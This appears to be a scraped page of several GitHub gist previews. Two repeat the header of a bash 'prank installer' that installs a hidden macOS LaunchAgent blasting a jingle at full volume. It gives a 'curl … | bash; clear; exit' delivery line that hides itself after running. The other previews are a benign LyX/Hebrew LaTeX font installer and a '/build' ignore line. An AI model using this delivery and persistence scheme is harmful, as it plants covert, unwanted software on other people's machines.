This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # ============================================================================= | |
| # Prank Installer (template -- use build.sh to produce the final version) | |
| # | |
| # Installs a hidden LaunchAgent that randomly plays a jingle at max volume. | |
| # Designed for macOS 15+ (Sequoia / darwin 25+). | |
| # | |
| # Delivery: curl -sL <short-url> | bash; clear; exit | |
| # ============================================================================= | |
| set -e |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # ============================================================================= | |
| # Prank Installer (template -- use build.sh to produce the final version) | |
| # | |
| # Installs a hidden LaunchAgent that randomly plays a jingle at max volume. | |
| # Designed for macOS 15+ (Sequoia / darwin 25+). | |
| # | |
| # Delivery: curl -sL <short-url> | bash; clear; exit | |
| # ============================================================================= | |
| set -e |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| sudo apt-get install lyx culmus culmus-fancy texlive-lang-other | |
| wget https://sourceforge.net/projects/ivritex/files/culmus-latex/culmus-latex-0.7/culmus-latex_0.7-1_all_fixed.deb/download -O culmus-latex_0.7-1_all_fixed.deb | |
| sudo dpkg -i culmus-latex_0.7-1_all_fixed.deb | |
| sudo apt-get install -f | |
| rm -f culmus-latex_0.7-1_all_fixed.deb |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /build |